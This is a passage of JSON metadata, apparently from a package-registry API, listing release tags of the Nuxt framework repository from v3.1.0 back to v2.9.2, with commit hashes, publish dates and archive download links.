"dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests